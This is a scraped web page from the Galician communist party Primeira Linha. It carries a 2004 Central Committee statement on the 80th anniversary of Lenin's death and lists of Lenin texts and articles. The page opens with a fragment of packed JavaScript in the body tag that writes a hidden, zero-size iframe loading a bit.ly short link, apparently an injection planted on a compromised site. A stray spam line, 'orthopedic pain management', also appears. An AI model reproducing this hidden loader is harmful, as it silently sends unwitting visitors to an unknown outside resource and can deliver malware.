\');',15,15,'|iframe|document|write|src|http|bit|ly|2b4mWbk|border|width|height|style|visibility|hidden'.split('|'),0,{}))" bgcolor="#FFFFFF" text="#000000" link="#000000" vlink="#666666" alink="#999999">
1924-2004: 80 aniversário de Lenine
orthopedic pain management

 

 

 

O novo ano coincide com o 80 aniversário da morte de Vladimir Ilich Ulíanov, mais conhecido como Lenine, figura chave do marxismo na viragem dos séculos XIX para XX, arquitecto do partido que realizou em 1917 a primeira revoluçom anticapitalista da história, e cujas achegas teórico-práticas continuam a ser referente ineludível para qualquer intervençom política comunista.

Por estes e outros muitos motivos, a morte de Lenine a 21 de Janeiro de 1924, antes de cumprir os 54 anos, nom vai passar despercebida para @s comunistas galeg@s.

Primeira Linha, ao longo deste novo ano, realizará um conjunto de iniciativas políticas para reivindicar a sua figura e o seu legado teórico-prático.

Umha parte da intervençom que o nosso Partido porá em andamento ao longo de 2004 tem como objectivo constatar e reivindicar umha evidência que a esquerda chauvinista espanhola, mas também sectores do nosso nacionalismo, negam e ocultam: o marxismo nom é contrário, mas sim favorável à emancipaçom e à liberdade dos povos.

Lenine foi umha das mais destacadas figuras históricas desta corrente revolucionária que mais tem reflectido sobre a questom nacional, defendendo o direito de autodeterminaçom e a liberdade dos povos como umha das tarefas primordiais de qualquer programa socialista, combatendo sem ambigüidades o chauvinismo implantado nas forças de esquerda das naçons opressoras.

Por este motivo, Primeira Linha, seguindo com a traduçom dos textos clássicos do marxismo para o nosso idioma mediante a Abrente Editora e a Biblioteca Galega de Marxismo-Leninismo, que se podem consultar neste sítio web, vai editar umha selecçom da vasta obra do revolucionário russo sobre a questom nacional, assim como outros dos seus escritos mais destacados.

Também entre as diversas iniciativas programadas está previsto centrar as VIII Jornadas Independentistas Galegas, que o nosso Partido vem realizando com carácter monográfico desde 1997, a reivindicar e analisar o seu legado teórico. Entre os dias 4 e 6 de Maio terá lugar umha nova ediçom do único foro público de debate e reflexom marxista existente na Galiza com a presença de destacad@s militantes comunistas que analisarám a actualidade do modelo leninista de partido, a sua contribuiçom para corrigir a deriva chauvinista do movimento operário, ou a sua destacada clarificaçom da defesa da autodeterminaçom para qualquer povo ou comunidade nacional que sofre umha opressom.

Em definitivo, estas e outras iniciativas, que serám realizadas ao longo deste ano que agora começa, devem servir para reforçar a construçom do partido comunista galego e para manifestar que qualquer projecto transformador e emancipador que nom recolha o cerne do legado leninista está condenado ao mais estrepitoso fracasso. A grave situaçom de hiperexploraçom e opressom que padece a classe operária galega e o do conjunto do planeta, a ofensiva fascista do capital contra os povos, @s trabalhadores/as e as mulheres, o reforçamento do machismo e o patriarcado, a opressom nacional da Galiza e de todas aquelas naçons às quais a burguesia nega sua existência, as guerras imperialistas e colonialistas que desenvolvem as potências imperialistas no Iraque ou no Afeganistám, a intolerável miséria e fame que padecem centenas de milhons de pessoas, a irreversível agressom contra o meio natural provocada polo letal modo de produçom capitalista, só podem ser combatidas mediante umha revoluçom socialista.

Os grandes males tenhem que ser curados com grandes remédios. Nunca foi tam necessário agitar, denunciar organizar, unir, clarificar. Nunca foi tam urgente dotar as classes trabalhadoras de instrumentos eficazes de resistência e luita. Nunca foi tam imprescindível um partido de combate e direcçom política.

Tal como escreveu Marx em Abril de 1871 e Lenine lembrou no Estado e a Revoluçom (Setembro de 1917), devemos tomar o céu por assalto.

Nom há outra alternativa. A luita é o único caminho. Comunismo ou Caos.

Comité Central de Primeira Linha, 1 de Janeiro de 2004

 

Novidades

 

- Dezembro de 2004. A verdadeira personalidade de Lenine. Víctor Serge (+...) (Publicado em La Batalla, órgao de expressom do POUM, em 1937)

Livros e artigos de Lenine

 

Sobre as greves. 1899 Ediçom digital de Junho de 2002

O nosso programa. 1899 Ediçom digital de Janeiro de 2004

Que fazer?. 1902 Ediçom digital de Maio de 2002

Os acontecimentos dos Balcáns e a Pérsia. 1908 Ediçom digital de Janeiro de 2004

Para a memória da Comuna. 1911 Ediçom digital de Julho de 2003

Democracia e populismo na China. 1912 Ediçom digital de Janeiro de 2004

As Três Fontes e as Três Partes Constitutivas do Marxismo. 1913 Ediçom digital de Janeiro de 2003

A classe operária e a questom nacional. Vladímir Illich Ulliánov Lenine, 1913. Ediçom digital de Outubro de 2004

É necessária umha língua oficial?. 1914. Ediçom digital de Outubro de 2004

O orgulho nacional dos gram-russos. 1914. Ediçom digital de Novembro de 2004

Igualdade nacional. 1915. Ediçom digital de Setembro de 2004

Karl Marx. Breve esboço biográfico seguido de umha exposiçom do marxismo. 1915. Ediçom digital de Janeiro de 2004

A palavra de ordem dos Estados Unidos da Europa. 1915. Ediçom digital de Agosto de 2004

Primeiro rascunho das teses sobre os problemas nacional e colonial. 1916 Ediçom digital de Fevereiro de 2004

O imperialismo, etapa superior do capitalismo. 1916 Ediçom digital de Janeiro de 2003

O imperialismo e a cisom do socialismo. 1916 Ediçom digital de Janeiro de 2004

A revoluçom socialista e o direito das naçons à autodeterminaçom. 1916 Ediçom digital de Dezembro de 2003

O Oportunismo e a Falência da II Internacional.1916 Ediçom digital de Maio de 2003

Teses de Abril. 1917 Ediçom digital de Agosto de 2003

O Estado e a Revoluçom. 1917 Ediçom digital de Maio de 2002

O Estado. 1919 Ediçom digital de Maio de 2002

O poder soviético e a situaçom da mulher. 1919 Ediçom digital de Março de 2004

A doença infantil do "esquerdismo" no comunismo. 1920 Ediçom digital de Junho de 2002

A respeito do problema das Nacionalidades ou sobre a "Autonomizaçom" . 1922 Ediçom digital de Maio de 2002

O Materialismo Dialéctico e o Anarquismo Ediçom digital de Janeiro de 2003

 

Artigos sobre Lenine

A verdadeira personalidade de Lenine. Víctor Serge (+...) (Publicado em La Batalla, órgao de expressom do POUM, em 1937)

A actualidade de Lenine e do seu luitar em tempos de crise quando assistimos à canonizaçom do mercado universal. Domingos A. Garcia (+...) (Publicado no número 33 do Abrente, Julho de 2004)

Que fazer com Lenine?. X. Antón Dobao (+...) (Publicado no número 33 do Abrente, Julho de 2004)

Oitenta anos a enterrar Lenine. Francisco Martins (+...) (Publicado no número 33 do Abrente, Julho de 2004)

A Revoluçom de Outubro e a questom nacional. Lenine frente a Estaline. Michael Löwy (+...) (Publicado no número 32 do Abrente, Junho de 2004)

A boa saúde de Lenine a 80 anos da sua morte. (+...) André Seoane Antelo (publicado no número 31 do Abrente, Março de 2004)

Illitch 99.(+...) Georges Labica (publicado no número 14 do Abrente, Outubro de 1999)

Reivindicando Lenine: o combate comunista por umha sociedade igualitária continua. (+...) Domingos Antom Garcia Fernandes (publicado no número 13 do Abrente, Julho de 1999)

 

Ligaçons recomendadas sobre Lenine

Marxist Internet Archives. Lenine